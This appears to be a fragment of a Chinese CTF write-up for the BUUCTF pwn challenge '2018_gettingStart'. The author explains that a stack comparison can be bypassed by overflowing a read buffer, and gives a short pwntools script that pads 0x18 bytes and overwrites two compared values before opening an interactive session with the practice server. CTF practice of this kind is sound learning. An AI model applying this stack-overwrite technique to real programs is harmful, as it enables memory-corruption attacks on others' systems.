吓人对吧
看一眼ida,原来只要绕过if就行,问题又来了,怎么绕过?
看到这里是栈上比较,然后buf可以往栈上读入数据,所以只要合理布局就行
from pwn import*context.log_level='debug'#io = process('./2018_gettingStart')io = remote('node4.buuoj.cn',28703)elf = ELF('./2018_gettingStart')payload = b'a'*0x18+p64(0x7FFFFFFFFFFFFFFF)+p64(0x3fb999999999999a)#gdb.attach(io)io.send(payload)#pause()io.interactive()
若有收获,就点个赞吧
0 人点赞
